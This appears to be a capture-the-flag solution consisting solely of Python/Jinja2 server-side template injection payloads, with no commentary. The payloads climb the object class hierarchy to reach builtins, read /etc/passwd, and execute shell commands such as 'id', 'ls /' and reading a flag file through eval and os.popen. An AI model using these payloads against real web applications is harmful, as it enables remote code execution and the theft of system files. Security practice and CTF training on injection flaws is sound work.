{{{}.__class__.__bases__[0].__subclasses__()}}

{{{}.__class__.__bases__[0].__subclasses__()[218]}}

{{{}.__class__.__bases__[0].__subclasses__()[218].__init__.__globals__['__builtins__']}}

{{{}.__class__.__bases__[0].__subclasses__()[218].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()}}

{{{}.__class__.__bases__[0].__subclasses__()[217].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")}}

{{{}.__class__.__bases__[0].__subclasses__()[217].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /etc/passwd').read()")}}

{{{}.__class__.__bases__[0].__subclasses__()[217].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls /').read()")}}

{{{}.__class__.__bases__[0].__subclasses__()[217].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /th1s_15_fl4ggggggg').read()")}}
